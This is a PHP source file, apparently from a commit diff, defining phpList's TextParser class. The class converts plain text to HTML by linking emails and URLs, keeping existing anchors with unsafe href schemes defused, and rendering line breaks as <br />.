|
| 1 | +<?php |
| 2 | + |
| 3 | +declare(strict_types=1); |
| 4 | + |
| 5 | +namespace PhpList\Core\Domain\Messaging\Service; |
| 6 | + |
/**
 * Converts plain text into simple HTML.
 *
 * Email addresses and bare http(s)/www URLs are turned into anchors, anchors
 * already present in the text are kept (with unsafe href schemes defused),
 * and line breaks are rendered as "<br />".
 */
class TextParser
{
    /**
     * Matches one anchor that carries an href attribute.
     *
     * Groups: 1 = text before the anchor, 2 = href value, 3 = remaining
     * attributes, 4 = link text, 5 = text after the anchor.
     */
    private const LINK_PATTERN = "/(.*)<a.*href\s*=\s*\"(.*?)\"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is";

    /**
     * @param string $text Plain text, optionally containing <a href="..."> anchors.
     *
     * @return string The text with emails/URLs made clickable and "\n" rendered as "<br />\n".
     */
    public function __invoke(string $text): string
    {
        // get rid of whitespace/newlines at the beginning of the text
        $text = ltrim($text);

        // Stash the anchors that are already in the text *before* linking
        // emails, so an address inside an existing href or link text is not
        // wrapped in a second, nested anchor.
        [$text, $links] = $this->stashLinks($text, []);

        // make emails clickable
        $text = $this->replace(
            "/([\._a-z0-9-]+@[\.a-z0-9-]+)/i",
            '<a href="mailto:\\1" class="email">\\1</a>',
            $text
        );

        // Stash the generated mailto anchors as well, so the URL patterns
        // below cannot rewrite a "www." inside an email domain.
        [$text, $links] = $this->stashLinks($text, $links);

        // make www. -> http://www.
        $text = $this->replace("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i", 'http://\\1', $text);
        // take out the duplicate schema the previous step may have produced
        $text = $this->replace("/(https?:\/\/)http?:\/\//i", '\\1', $text);
        $text = $this->replace("/(ftp:\/\/)http?:\/\//i", '\\1', $text);

        // eg -- http://kernel.org -> <a href="http://kernel.org" ...>kernel.org</a>
        $text = $this->replace(
            "/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i",
            '<a href="\\1\\2" class="url" target="_blank">\\2</a>',
            $text
        );

        // eg -- http://www.google.com -> <a href="http://www.google.com" ...>www.google.com</a>
        $text = $this->replace(
            "/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@!\\-_]+)/i",
            '<a href="\\1\\2\\3" class="url" target="_blank">\\2\\3</a>',
            $text
        );

        // Take off a possible last full stop and move it outside the link.
        // The groups exclude '"' and '<' so a match can never span more than
        // one generated anchor when several URLs share a line.
        $text = $this->replace(
            '/<a href="([^"]*)\." class="url" target="_blank">([^<]*)\.<\/a>/i',
            '<a href="\\1" class="url" target="_blank">\\2</a>.',
            $text
        );

        // Put the stashed anchors back. A stashed anchor can only contain
        // placeholders with a lower index, so restoring from the highest
        // index down resolves nested placeholders too. str_replace is used
        // because the anchors are literal text, not regex replacements.
        for ($index = count($links) - 1; $index >= 0; --$index) {
            $text = str_replace('%%' . $index . '%%', $links[$index], $text);
        }

        // Drop carriage returns and render every newline as <br />.
        $text = str_replace("\r", '', $text);

        return str_replace("\n", "<br />\n", $text);
    }

    /**
     * Replaces every anchor matched by LINK_PATTERN with a "%%<index>%%"
     * placeholder and appends the rebuilt anchor to the list.
     *
     * @param string   $text  Text to scan.
     * @param string[] $links Anchors stashed so far; the array index is the placeholder number.
     *
     * @return array{0: string, 1: string[]} The text with placeholders and the extended list.
     */
    private function stashLinks(string $text, array $links): array
    {
        while (preg_match(self::LINK_PATTERN, $text, $matches) === 1) {
            $url = $matches[2];

            // Only hrefs that *start* with a whitelisted scheme keep their
            // colons; anything else (e.g. "javascript:...") is defused by
            // stripping every colon.
            if (preg_match('/^(?:https?|mailto|ftp):/i', $url) !== 1) {
                $url = str_replace(':', '', $url);
            }

            $index = count($links);
            $links[] = '<a href="' . $url . '" ' . $matches[3] . '>' . $matches[4] . '</a>';
            $text = $matches[1] . '%%' . $index . '%%' . $matches[5];
        }

        return [$text, $links];
    }

    /**
     * preg_replace wrapper that never returns null: when the regex engine
     * reports an error the subject is returned unchanged.
     */
    private function replace(string $pattern, string $replacement, string $subject): string
    {
        return preg_replace($pattern, $replacement, $subject) ?? $subject;
    }
}
0 commit comments